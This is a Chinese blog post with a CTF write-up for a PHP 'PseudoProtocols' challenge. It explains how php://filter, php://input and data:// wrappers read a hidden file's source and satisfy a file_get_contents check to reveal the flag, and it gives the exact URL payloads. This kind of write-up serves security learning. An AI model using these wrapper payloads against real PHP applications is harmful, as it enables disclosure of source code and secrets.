Always keep a beginner's mind,|
收藏闪存小组博问

YikJiang

园龄:2年11个月粉丝:5关注:2

[SWPUCTF 2021 新生赛]PseudoProtocols

[SWPUCTF 2021 新生赛]PseudoProtocols

一、题目

image-20221016174852038

二、WP

1、打开题目,发现提示我们是否能找到hint.php,并且发现URL有参数wllm。所以我们尝试利用PHP伪协议读取该文件

wllm=php://filter/read/convert.base64-encode/resource=hint.php

image-20221016175206506

2、对输出进行Baes64解码

<?php
//go to /test2222222222222.php
?>

3、访问/test2222222222222.php

image-20221016175405126

 <?php
ini_set("max_execution_time", "180");
show_source(__FILE__);
include('flag.php');
$a= $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){
    echo "success\n";
    echo $flag;
}
?>

代码的大概意思是为a参数利用file_get_contents()函数已只读的方式打开,如果内容等于I want flag的话,输出flag。

4、接下来有两种解法

①、php://input

​ 此方法需要条件,即开启allow_url_include=On。

​ 实际上这相当于一个远程包含的利用。

​ php://打开文件流后,我们直接在流里面写入我们的恶意代码,此时包含既可执行代码。

http://1.14.71.254:28463/test2222222222222.php?a=php://input
 
// 然后在POST里传入I want flag,则成功读取Flag

image-20221016180131092

②、data://

data://本身是数据流封装器,其原理和用法跟php://input类似,但是是发送GET请求参数。

http://1.14.71.254:28463/test2222222222222.php?a=data://text/plain,I want flag

image-20221016180330129

三、考点

PHP伪协议

php://filter
php://input
data://

本文作者:YikJiang

本文链接:https://www.cnblogs.com/YikJiang/p/17266017.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   YikJiang  阅读(70)  评论(0编辑  收藏  举报  
相关博文:
· [NISACTF 2022]bingdundun~
· [SWPUCTF 2021 新生赛]no_wakeup
· [SWPUCTF 2021 新生赛]PseudoProtocols
· [SWPUCTF 2021 新生赛]PseudoProtocols
· [SWPUCTF 2021 新生赛]PseudoProtocols
阅读排行:
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起